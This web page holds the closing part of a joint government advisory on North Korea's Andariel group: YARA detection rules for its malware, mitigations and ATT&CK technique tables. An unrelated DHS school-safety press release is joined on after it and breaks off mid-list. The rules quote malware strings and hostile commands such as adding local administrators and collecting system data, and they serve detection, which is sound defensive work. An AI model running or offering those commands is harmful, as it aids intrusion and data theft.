rule Andariel_ScheduledTask_Loader { strings: $obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 } $obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 } $obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00 48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 } condition: uint16(0) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3 }
rule Andariel_KaosRAT_Yamabot { strings: $str1 = “/kaos/” $str2 = “Abstand [“ $str3 = “] anwenden” $str4 = “cmVjYXB0Y2hh” $str5 = “/bin/sh” $str6 = “utilities.CIpaddress” $str7 = “engine.NewEgg” $str8 = “%s%04x%s%s%s” $str9 = “Y2FwdGNoYV9zZXNzaW9u” $str10 = “utilities.EierKochen” $str11 = “kandidatKaufhaus” condition: 3 of them }
rule TriFaux_EasyRAT_JUPITER { strings: $InitOnce = “InitOnceExecuteOnce” $BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A } $Bytes = “4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,” wide condition: uint16(0) == 0x5a4d and all of them }
rule Andariel_CutieDrop_MagicRAT { strings: $config_os_w = “os/windows” ascii wide $config_os_l = “os/linux” ascii wide $config_os_m = “os/mac” ascii wide $config_comp_msft = “company/microsoft” ascii wide $config_comp_orcl = “company/oracle” ascii wide $POST_field_1 = “session=” ascii wide $POST_field_2 = “type=” ascii wide $POST_field_3 = “id=” ascii wide $command_misspelled = “renmae” ascii wide condition: uint16(0) == 0x5a4d and 7 of them
rule Andariel_hhsd_FileTransferTool { strings: // 30 4D C7 xor [rbp+buffer_v41+3], cl // 81 7D C4 22 C0 78 00 cmp dword ptr [rbp+buffer_v41], 78C022h // 44 88 83 00 01 00 00 mov [rbx+100h], r8b $handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 88 } // B1 14 mov cl, 14h // C7 45 F7 14 00 41 00 mov [rbp+57h+Src], 410014h // C7 45 FB 7A 00 7F 00 mov [rbp+57h+var_5C], 7F007Ah // C7 45 FF 7B 00 63 00 mov [rbp+57h+var_58], 63007Bh // C7 45 03 7A 00 34 00 mov [rbp+57h+var_54], 34007Ah // C7 45 07 51 00 66 00 mov [rbp+57h+var_50], 660051h // C7 45 0B 66 00 7B 00 mov [rbp+57h+var_4C], 7B0066h // C7 45 0F 66 00 00 00 mov [rbp+57h+var_48], 66h ; ‘f’ $err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 } // 41 02 D0 add dl, r8b // 44 02 DA add r11b, dl // 3C 1F cmp al, 1Fh $buf_add_cmp_1f = { 4? 02 ?? 4? 02 ?? 3? 1F }
// B9 8D 10 B7 F8 mov ecx, 0F8B7108Dh // E8 F1 BA FF FF call sub_140001280 $hash_call_loadlib = { B? 8D 10 B7 F8 E8 } $hash_call_unk = { B? 91 B8 F6 88 E8 } condition: uint16(0) == 0x5a4d and (any of ($handshake, $err_xor_str, $buf_add_cmp_1f) and any of ($hash_call_*)) or 2 of ($handshake, $err_xor_str, $buf_add_cmp_1f)
rule Andariel_Atharvan_3RAT { strings: $3RAT = “D:\rang\TOOL\3RAT” $atharvan = “Atharvan_dll.pdb” condition: uint16(0) == 0x5a4d and any of them }
rule Andariel_LilithRAT_Variant { strings: // The following are strings seen in the open source version of Lilith $lilith_1 = “Initiate a CMD session first.” ascii wide $lilith_2 = “CMD is not open” ascii wide $lilith_3 = “Couldn’t write command” ascii wide $lilith_4 = “Couldn’t write to CMD: CMD not open” ascii wide // The following are strings that appear to be unique to the Unnamed Trojan based on Lilith $unique_1 = “Upload Error!” ascii wide $unique_2 = “ERROR: Downloading is already running!” ascii wide $unique_3 = “ERROR: Unable to open file:” ascii wide $unique_4 = “General error” ascii wide $unique_5 = “CMD error” ascii wide $unique_6 = “killing self” ascii wide condition: uint16(0) == 0x5a4d and filesize < 150KB and all of ($lilith_) and 2 of ($unique_) }
rule Andariel_SocksTroy_Strings_OpCodes { strings: $strHost = “-host” wide $strAuth = “-auth” wide $SocksTroy = “SocksTroy” $cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B } condition: uint16(0) == 0x5a4d and ((1 of ($str)) and (all of ($c)) or (all of ($Socks*))) }
rule Andariel_Agni { strings: $xor = { 34 ?? 88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 } $stackstrings = {C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5-10] C7 44 24} condition: uint16(0) == 0x5a4d and (#xor > 100 and #stackstrings > 5) }
rule Andariel_GoLang_validalpha_handshake { strings: $ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 } condition: all of them }
rule Andariel_GoLang_validalpha_tasks { strings: $ = “main.ScreenMonitThread” $ = “main.CmdShell” $ = “main.GetAllFoldersAndFiles” $ = “main.SelfDelete” condition: all of them }
rule Andariel_GoLang_validalpha_BlackString { strings: $ = “I:/01___Tools/02__RAT/Black” condition: uint16(0) == 0x5A4D and all of them }
rule INDICATOR_EXE_Packed_VMProtect { strings: $s1 = “.vmp0” fullword ascii $s2 = “.vmp1” fullword ascii condition: uint16(0) == 0x5a4d and all of them or for any i in (0 .. pe.number_of_sections) : ( ( pe.sections[i].name == “.vmp0” or pe.sections[i].name == “.vmp1” ) ) }
rule INDICATOR_EXE_Packed_Themida { strings: $s1 = “.themida” fullword ascii condition: uint16(0) == 0x5a4d and all of them or for any i in (0 .. pe.number_of_sections) : ( ( pe.sections[i].name == “.themida” ) ) }
rule Andariel_elf_backdoor_fipps { strings: $a = “found mac address” $b = “RecvThread” $c = “OpenSSL-1.0.0-fipps” $d = “Disconnected!” condition: (all of them) and uint32(0) == 0x464c457f }
rule Andariel_bindshell { strings: $str_comspec = “COMSPEC” $str_consolewindow = “GetConsoleWindow” $str_ShowWindow = “ShowWindow” $str_WSASocketA = “WSASocketA” $str_CreateProcessA = “CreateProcessA” $str_port = {B9 4D 05 00 00 89} condition: uint16(0) == 0x5A4D and all of them }
rule Andariel_grease2 { strings: $str_rdpconf = “c: \windows\temp\RDPConf.exe” fullword nocase $str_rdpwinst = “c: \windows\temp\RDPWInst.exe” fullword nocase $str_net_user = “net user” $str_admins_add = “net localgroup administrators” condition: uint16(0) == 0x5A4D and all of them }
rule Andariel_NoPineapple_Dtrack_unpacked { strings: $str_nopineapple = “< No Pineapple! >“ $str_qt_library = “Qt 5.12.10” $str_xor = {8B 10 83 F6 ?? 83 FA 01 77} condition: uint16(0) == 0x5A4D and all of them }
rule Andariel_dtrack_unpacked { strings: $str_mutex = “MTX_Global” $str_cmd_1 = “/c net use \\” wide $str_cmd_2 = “/c ping -n 3 127.0.01 > NUL % echo EEE > “%s”” wide $str_cmd_3 = “/c move /y %s \\” wide $str_cmd_4 = “/c systeminfo > “%s” & tasklist > “%s” & netstat -naop tcp > “%s”” wide condition: uint16(0) == 0x5A4D and all of them }
rule Andariel_TigerRAT_crowdsourced_rule { strings: $m1 = “.?AVModuleKeyLogger@@” fullword ascii $m2 = “.?AVModulePortForwarder@@” fullword ascii $m3 = “.?AVModuleScreenCapture@@” fullword ascii $m4 = “.?AVModuleShell@@” fullword ascii $s1 = “\x9891-009942-xnopcopie.dat” fullword wide $s2 = “(%02d : %02d-%02d %02d:%02d:%02d)— %s[Clipboard]” fullword ascii $s3 = “[%02d : %02d-%02d %02d:%02d:%02d]— %s[Title]” fullword ascii $s4 = “del “%s”%s “%s” goto ” ascii $s5 = “[<<]" fullword ascii condition: uint16(0) == 0x5a4d and (all of ($s) or (all of ($m) and 1 of ($s)) or (2 of ($m) and 2 of ($s*))) }
rule win_tiger_rat_auto { strings: $sequence_0 = { 33c0 89442438 89442430 448bcf 4533c0 } // n = 5, score = 200 // 33c0 \| jmp 5 // 89442438 \| dec eax // 89442430 \| mov eax, ecx // 448bcf \| movzx eax, byte ptr [eax] // 4533c0 \| dec eax $sequence_1 = { 41b901000000 488bd6 488bcb e8???????? } // n = 4, score = 200 // 41b901000000 \| dec eax // 488bd6 \| mov eax, dword ptr [ecx] // 488bcb \| jmp 8 // e8???????? \| $sequence_2 = { 4881ec90050000 8b01 8985c8040000 8b4104 } // n = 4, score = 200 // 4881ec90050000 \| test eax, eax // 8b01 \| jns 0x16 // 8985c8040000 \| dec eax // 8b4104 \| mov eax, dword ptr [ecx] $sequence_3 = { 488b01 ff10 488b4f08 4c8d4c2430 } // n = 4, score = 200 // 488b01 \| mov edx, esi // ff10 \| dec eax // 488b4f08 \| mov ecx, ebx // 4c8d4c2430 \| inc ecx $sequence_4 = { 488b01 ff10 488b4e18 488b01 } // n = 4, score = 200 // 488b01 \| dec eax // ff10 \| cmp dword ptr [ecx + 0x18], 0x10 // 488b4e18 \| dec eax // 488b01 \| sub esp, 0x590 $sequence_5 = { 4881eca0000000 33c0 488bd9 488d4c2432 } // n = 4, score = 200 // 4881eca0000000 \| mov eax, dword ptr [ecx] // 33c0 \| mov dword ptr [ebp + 0x4c8], eax // 488bd9 \| mov eax, dword ptr [ecx + 4] // 488d4c2432 \| mov dword ptr [ebp + 0x4d0], eax $sequence_6 = { 488b01 eb03 488bc1 0fb600 } // n = 4, score = 200 // 488b01 \| inc ecx // eb03 \| mov ebx, dword ptr [ebp + ebp] // 488bc1 \| inc ecx // 0fb600 \| movups xmmword ptr [edi], xmm0 $sequence_7 = { 488b01 8b10 895124 448b4124 4585c0 } // n = 5, score = 200 // 488b01 \| sub esp, 0x30 // 8b10 \| dec ecx // 895124 \| mov ebx, eax // 448b4124 \| dec eax // 4585c0 \| mov ecx, eax $sequence_8 = { 4c8d0d31eb0000 c1e918 c1e808 41bf00000080 } // n = 4, score = 100 // 4c8d0d31eb0000 \| jne 0x1e6 // c1e918 \| dec eax // c1e808 \| lea ecx, [0xbda0] // 41bf00000080 \| dec esp $sequence_9 = { 488bd8 4885c0 752d ff15???????? 83f857 0f85e0010000 488d0da0bd0000 } // n = 7, score = 100 // 488bd8 \| dec eax // 4885c0 \| mov ebx, eax // 752d \| dec eax // ff15???????? \| // 83f857 \| test eax, eax // 0f85e0010000 \| jne 0x2f // 488d0da0bd0000 \| cmp eax, 0x57 $sequence_10 = { 75d4 488d1d7f6c0100 488b4bf8 4885c9 740b } // n = 5, score = 100 // 75d4 \| lea ecx, [0xeb31] // 488d1d7f6c0100 \| shr ecx, 0x18 // 488b4bf8 \| shr eax, 8 // 4885c9 \| inc ecx // 740b \| mov edi, 0x80000000 $sequence_11 = { 0f85d9000000 488d15d0c90000 41b810200100 488bcd e8???????? eb6b b9f4ffffff } // n = 7, score = 100 // 0f85d9000000 \| jne 0xffffffd6 // 488d15d0c90000 \| dec eax // 41b810200100 \| lea ebx, [0x16c7f] // 488bcd \| dec eax // e8???????? \| // eb6b \| mov ecx, dword ptr [ebx – 8] // b9f4ffffff \| dec eax $sequence_12 = { 48890d???????? 488905???????? 488d05ae610000 488905???????? 488d05a0550000 488905???????? } // n = 6, score = 100 // 48890d???????? \| // 488905???????? \| // 488d05ae610000 \| test ecx, ecx // 488905???????? \| // 488d05a0550000 \| je 0x10 // 488905???????? \| $sequence_13 = { 8bcf e8???????? 488b7c2448 85c0 0f8440030000 488d0560250100 } // n = 6, score = 100 // 8bcf \| mov eax, 0x12010 // e8???????? \| // 488b7c2448 \| dec eax // 85c0 \| mov ecx, ebp // 0f8440030000 \| jmp 0x83 // 488d0560250100 \| mov ecx, 0xfffffff4 $sequence_14 = { ff15???????? 8b05???????? 2305???????? ba02000000 33c9 8905???????? 8b05???????? } // n = 7, score = 100 // ff15???????? \| // 8b05???????? \| // 2305???????? \| // ba02000000 \| dec eax // 33c9 \| lea eax, [0x61ae] // 8905???????? \| // 8b05???????? \| $sequence_15 = { 4883ec30 498bd8 e8???????? 488bc8 4885c0 } // n = 5, score = 100 // 4883ec30 \| jne 0xdf // 498bd8 \| dec eax // e8???????? \| // 488bc8 \| lea edx, [0xc9d0] // 4885c0 \| inc ecx condition: 7 of them and filesize < 557056 }
rule win_dtrack_auto { strings: $sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 } // n = 7, score = 400 // 52 \| push edx // 8b4508 \| mov eax, dword ptr [ebp + 8] // 50 \| push eax // e8???????? \| // 83c414 \| add esp, 0x14 // 8b4d10 \| mov ecx, dword ptr [ebp + 0x10] // 51 \| push ecx $sequence_1 = { 3a4101 7523 83854cf6ffff02 838550f6ffff02 80bd4af6ffff00 75ae c78544f6ffff00000000 } // n = 7, score = 300 // 3a4101 \| cmp al, byte ptr [ecx + 1] // 7523 \| jne 0x25 // 83854cf6ffff02 \| add dword ptr [ebp – 0x9b4], 2 // 838550f6ffff02 \| add dword ptr [ebp – 0x9b0], 2 // 80bd4af6ffff00 \| cmp byte ptr [ebp – 0x9b6], 0 // 75ae \| jne 0xffffffb0 // c78544f6ffff00000000 \| mov dword ptr [ebp – 0x9bc], 0 $sequence_2 = { 50 ff15???????? a3???????? 68???????? e8???????? 83c404 50 } // n = 7, score = 300 // 50 \| push eax // ff15???????? \| // a3???????? \| // 68???????? \| // e8???????? \| // 83c404 \| add esp, 4 // 50 \| push eax $sequence_3 = { 8d8dd4faffff 51 e8???????? 83c408 8b15???????? } // n = 5, score = 300 // 8d8dd4faffff \| lea ecx, [ebp – 0x52c] // 51 \| push ecx // e8???????? \| // 83c408 \| add esp, 8 // 8b15???????? \| $sequence_4 = { 8855f5 6a5c 8b450c 50 e8???????? } // n = 5, score = 300 // 8855f5 \| mov byte ptr [ebp – 0xb], dl // 6a5c \| push 0x5c // 8b450c \| mov eax, dword ptr [ebp + 0xc] // 50 \| push eax // e8???????? \| $sequence_5 = { 51 e8???????? 83c410 8b558c 52 } // n = 5, score = 300 // 51 \| push ecx // e8???????? \| // 83c410 \| add esp, 0x10 // 8b558c \| mov edx, dword ptr [ebp – 0x74] // 52 \| push edx $sequence_6 = { 8b4d0c 51 68???????? 8d9560eaffff 52 e8???????? } // n = 6, score = 300 // 8b4d0c \| mov ecx, dword ptr [ebp + 0xc] // 51 \| push ecx // 68???????? \| // 8d9560eaffff \| lea edx, [ebp – 0x15a0] // 52 \| push edx // e8???????? \| $sequence_7 = { 83c001 8945f4 837df420 7d2c 8b4df8 } // n = 5, score = 300 // 83c001 \| add eax, 1 // 8945f4 \| mov dword ptr [ebp – 0xc], eax // 837df420 \| cmp dword ptr [ebp – 0xc], 0x20 // 7d2c \| jge 0x2e // 8b4df8 \| mov ecx, dword ptr [ebp – 8] $sequence_8 = { 83c001 89856cf6ffff 8b8d70f6ffff 8a11 } // n = 4, score = 300 // 83c001 \| add eax, 1 // 89856cf6ffff \| mov dword ptr [ebp – 0x994], eax // 8b8d70f6ffff \| mov ecx, dword ptr [ebp – 0x990] // 8a11 \| mov dl, byte ptr [ecx] $sequence_9 = { 0355f0 0fb602 0fb64df7 33c1 0fb655fc 33c2 } // n = 6, score = 200 // 0355f0 \| add edx, dword ptr [ebp – 0x10] // 0fb602 \| movzx eax, byte ptr [edx] // 0fb64df7 \| movzx ecx, byte ptr [ebp – 9] // 33c1 \| xor eax, ecx // 0fb655fc \| movzx edx, byte ptr [ebp – 4] // 33c2 \| xor eax, edx $sequence_10 = { d1e9 894df8 8b5518 8955fc c745f000000000 } // n = 5, score = 200 // d1e9 \| shr ecx, 1 // 894df8 \| mov dword ptr [ebp – 8], ecx // 8b5518 \| mov edx, dword ptr [ebp + 0x18] // 8955fc \| mov dword ptr [ebp – 4], edx // c745f000000000 \| mov dword ptr [ebp – 0x10], 0 $sequence_11 = { 8b4df0 3b4d10 0f8d90000000 8b5508 0355f0 0fb602 } // n = 6, score = 200 // 8b4df0 \| mov ecx, dword ptr [ebp – 0x10] // 3b4d10 \| cmp ecx, dword ptr [ebp + 0x10] // 0f8d90000000 \| jge 0x96 // 8b5508 \| mov edx, dword ptr [ebp + 8] // 0355f0 \| add edx, dword ptr [ebp – 0x10] // 0fb602 \| movzx eax, byte ptr [edx] $sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc c1e908 0bc1 } // n = 6, score = 200 // 894d14 \| mov dword ptr [ebp + 0x14], ecx // 8b45f8 \| mov eax, dword ptr [ebp – 8] // c1e018 \| shl eax, 0x18 // 8b4dfc \| mov ecx, dword ptr [ebp – 4] // c1e908 \| shr ecx, 8 // 0bc1 \| or eax, ecx $sequence_13 = { 0bc1 894518 8b5514 8955f8 } // n = 4, score = 200 // 0bc1 \| or eax, ecx // 894518 \| mov dword ptr [ebp + 0x18], eax // 8b5514 \| mov edx, dword ptr [ebp + 0x14] // 8955f8 \| mov dword ptr [ebp – 8], edx $sequence_14 = { 8b5514 8955f8 8b4518 8945fc e9???????? 8be5 } // n = 6, score = 200 // 8b5514 \| mov edx, dword ptr [ebp + 0x14] // 8955f8 \| mov dword ptr [ebp – 8], edx // 8b4518 \| mov eax, dword ptr [ebp + 0x18] // 8945fc \| mov dword ptr [ebp – 4], eax // e9???????? \| // 8be5 \| mov esp, ebp condition: 7 of them and filesize < 1736704 }

Mitigation Measures

The authoring agencies recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity.

Log4Shell and Other Log4j Vulnerabilities

Defenders should consult the joint Cybersecurity Advisory titled “Mitigating Log4Shell and Other Log4j-Related Vulnerabilities” and CISA’s “Apache Log4j Vulnerability” guidance. Organizations can mitigate the risks posed by the vulnerability by identifying assets affected by Log4Shell and other Log4j-related vulnerabilities and upgrading Log4j assets and affected products to the latest version.

Note: CVE-2021-44228 ‘Log4Shell’ was disclosed in December 2021 and affects the Log4j library prior to version 2.17.0.

Defenders should remain alert to vendor software updates, and initiate hunt and incident response procedures to detect possible Log4Shell exploitation.

Web Shell Malware

Web shell malware is deployed by adversaries on a victim’s web server to execute arbitrary system commands. The NSA and Australian Signals Directorate’s report titled “Detect and Prevent Web Shell Malware” provides mitigating actions to identify and recover from web shells.

Preventing exploitation of web-facing servers often depends on maintaining an inventory of systems and applications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind reverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs).

Endpoint Activity

Preventing and detecting further adversary activity should focus on deploying endpoint agents or other monitoring mechanisms, blocking unnecessary outbound connections, blocking external access to administrator panels and services or turning them off entirely, and segmenting the network to prevent lateral movement from a compromised web server to critical assets.

Command Line Activity and Remote Access

Monitoring for suspicious command-line activity, implementing multi-factor authentication for remote access services, and properly segmenting and using allow-listing tools for critical assets can protect against malicious activity by RGB 3rd Bureau’s Andariel group and other cyber threat actors.

Packing

Signatures for Themida, VMProtect and a number of other packers are available here, however, the signatures will not identify every file packed using these applications.

Check for security vulnerabilities, apply patches, and update to the latest version of software
Encrypt all sensitive data including personal information
Block access to unused ports
Change passwords when they are suspected of being compromised
Strengthen the subscriber identity authentication process for leased servers

DPRK Rewards for Justice

The U.S. and ROK Governments encourage victims to report suspicious activities, including those related to suspected DPRK cyber activities, to relevant authorities. If you provide information about illicit DPRK activities in cyberspace, including past or ongoing operations, you may be eligible for a reward. If you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information through the Department of State’s Rewards for Justice program could make you eligible to receive an award of up to $10 million. For further details, please visit https://rewardsforjustice.net/.

Acknowledgements

Mandiant and Microsoft Threat Intelligence contributed to this CSA.

Disclaimer of Endorsement

Your organization has no obligation to respond or provide information in response to this product. If, after reviewing the information provided, your organization decides to provide information to the authorizing agencies, it must do so consistent with applicable state and federal law.

The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or service by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the co-authors.

Trademark Recognition

Active Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT&CK® are registered trademarks of The MITRE Corporation.

Purpose

This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

Contact

U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/fieldoffices.

DC3 Cyber Forensics Laboratory (CFL): afosi.dc3.cflintake@us.af.mil

DoD-Defense Industrial Base (DIB) Collaborative Information Sharing Environment (DCISE): dc3.dcise@us.af.mil

NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov

NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov

NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov

Republic of Korea organizations: If you suspect cyber incidents involving state actors, including Andariel, or discover similar cases, please contact the relevant authorities below.

National Intelligence Service: www.nis.go.kr, +82 111

References

AhnLab Security Emergency Response Center:

Boredhackerblog: http://www.boredhackerblog.info/2022/11/openssl-100-fipps-linux-backdoor-notes.html

Cisco Talos Intelligence blogs:

DCSO blog: https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499

Github.com/ditekshen: https://github.com/ditekshen/detection/blob/master/yara/indicator_packed.yar

JPCERT blogs:

Mandiant blogs:

Microsoft blogs:

NSCS Guidance:

Symantec blog: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research

VMware blog: https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html

WithSecure Labs report: https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector

Appendix: MITRE ATT&CK Techniques and Software

The tactics and techniques referenced in this advisory are identified in Table 3 – Table 12.

*Table 3. Reconnaissance and Enumeration*
Technique Title	ID	Use
Gather Victim Org Information	T1591	The actors gather information about the victim’s organization that can be used during targeting.
Gather Victim Host Information	T1592	The actors gather information about the victim’s hosts that can be used during targeting.
Active Scanning	T1595	The actors execute active reconnaissance scans to gather information that can be used during targeting.
Search Open Technical Databases	T1596	The actors search freely available technical databases for information about victims that can be used during targeting.

*Table 4. Resource Development, Tooling, and Remote Access Tools (RATs)*
Technique Title	ID	Use
OS Credential Dumping	T1003	The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.
Exfiltration Over Alternative Protocol	T1048	The actors steal data by exfiltrating it over a different protocol than that of the existing command and control channel.
Proxy	T1090	The actors use a connection proxy to direct network traffic between systems or act as intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.
Archive Collected Data	T1560	The actors compress and/or encrypt data that is collected prior to exfiltration.
Protocol Tunneling	T1572	The actors tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems.
Develop Capabilities: Malware	T1587.001	The actors develop malware and malware components that can be used during targeting.
Develop Capabilities: Exploits	T1587.004	The actors develop exploits that can be used during targeting.

*Table 5. Software used for Resource Development, Tooling, and RATs*
Software Title	ID	Use
Mimikatz	S0002	The actors use a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.
AdFind	S0552	The actors use a free command-line query tool that can be used for gathering information from the Active Directory.

*Table 6. Initial Access*
Technique Title	ID	Use
Exploit Public-Facing Application	T1190	The actors attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

*Table 7. Execution*
Technique Title	ID	Use
Command and Scripting Interpreter	T1059	The actors abuse command and script interpreters to execute commands, scripts, or binaries.

*Table 8. Defense Evasion*
Technique Title	ID	Use
Obfuscated Files or Information	T1027	The actors attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its content on the system or in transit.

*Table 9. Credential Access*
Technique Title	ID	Use
OS Credential Dumping	T1003	The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.

*Table 10. Discovery and Lateral Movement*
Technique Title	ID	Use
Remote Services	T1021	The actors use valid accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC.
Remote Services: SMB/Windows Admin Shares	T1021.002	The actors use valid accounts to interact with a remote network share using Server Message Block (SMB).
File and Directory Discovery	T1083	The actors enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Account Discovery	T1087	The actors attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment.

*Table 11. Command and Control*
Technique Title	ID	Use
Application Layer Protocol	T1071	The actors establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, telnet, DNP3, and Modbus.
Proxy	T1090	The actors use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.

*Table 12. Collection and Exfiltration*
Technique Title	ID	Use
Data from Network Shared Drive	T1039	The actors search network shares on computers they have compromised to find files of interest.
Exfiltration Over Alternative Protocol	T1048	The actors steal data by exfiltrating it over a different protocol than that of the existing command and control server.
Archive Collected Data	T1560	The actors compress and/or encrypt data that is collected prior to exfiltration.
Exfiltration Over Web Service	T1567	The actors use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

July 24, 2024

DHS Announces Membership to New Federal School Safety Clearinghouse External Advisory Board

Source: US Department of Homeland Security

School safety experts and leaders will advise on interagency school safety practices to better support K-12 communities

WASHINGTON – Today, the Department of Homeland Security announced the inaugural members of the Federal School Safety Clearinghouse External Advisory Board, a group of school safety experts and education leaders that will provide advice and recommendations on practical ways to enhance K-12 school safety and security. The Board builds upon the Biden-Harris Administration’s collective efforts to support K-12 communities in creating safer, more supportive learning environments and fulfills a key requirement of the Bipartisan Safer Communities Act.

The Board will advise the Secretary of Homeland Security through the Director of the Cybersecurity and Infrastructure Security Agency (CISA) on the implementation of evidence-based school safety practices and propose additional best practices for publication on the website SchoolSafety.gov. SchoolSafety.gov is the federal government’s platform that provides schools and districts with actionable recommendations to create safe and supportive environments for students and educators. The site serves as a one-stop access point for information, resources, and guidance for school safety from the Federal School Safety Clearinghouse, an interagency effort among the Departments of Education, Health and Human Services, Homeland Security, and Justice.

Today’s announcement comes nearly two years after the enactment of the Bipartisan Safer Communities Act, which codified and expanded the Clearinghouse and directed the establishment of this advisory board. The Board will be chaired by Ronn Nozoe, Chief Executive Officer of the National Association of Secondary School Principals (NASSP).

“Students and educators deserve safe environments that are free from fear. This Board will help schools and communities create safe learning spaces amid a diverse and ever-changing threat landscape,” said Secretary of Homeland Security Alejandro N. Mayorkas. “I thank these distinguished leaders and experts for dedicating their time and expertise to the worthiest of causes: identifying actions that will help keep our schools safe.”

“Our schools should never have to face threats alone. Part of our work includes making sure K-12 communities have access to the best possible resources and information from the federal government,” said CISA Director Jen Easterly. “It is my profound honor to work alongside these leaders in making real changes that will help protect our children and educators at school.”

“I’m deeply honored to serve as chair of the Federal School Safety Clearinghouse External Advisory Board,” said NASSP CEO Ronn Nozoe. “What makes this initiative truly special is the unprecedented collaboration between federal agencies, school safety and violence prevention experts, and the inclusion of voices from the frontlines of education – school leaders, educators and students. By bringing together this diverse group of stakeholders, we’re creating a powerful team that will drive real, positive change in school safety. This is how we make a lasting difference – by working together and ensuring that those most affected by these issues have a seat at the table.”

The newly appointed members represent a diverse set of perspectives and experiences and have expertise in education, developmental psychology, child and adolescent health, public safety, law enforcement, cybersecurity and emerging technologies, social work, and civil and human rights. They represent state, local, tribal and territorial governments; parents, legal guardians and students; law enforcement; school safety and non-profit organizations; educators and faculty associations; disability rights organizations; and the private sector. The Board’s work will help the federal government identify and execute upon actions that will better support schools across the country.

The inaugural members of the Board are:

Ronn Nozoe, Chief Executive Officer, National Association of Secondary School Principals (Chair);
Kevin Armstrong, President-elect, National Association of Elementary School Principals;
Tami Benton, President, American Academy of Child and Adolescent Psychiatry;
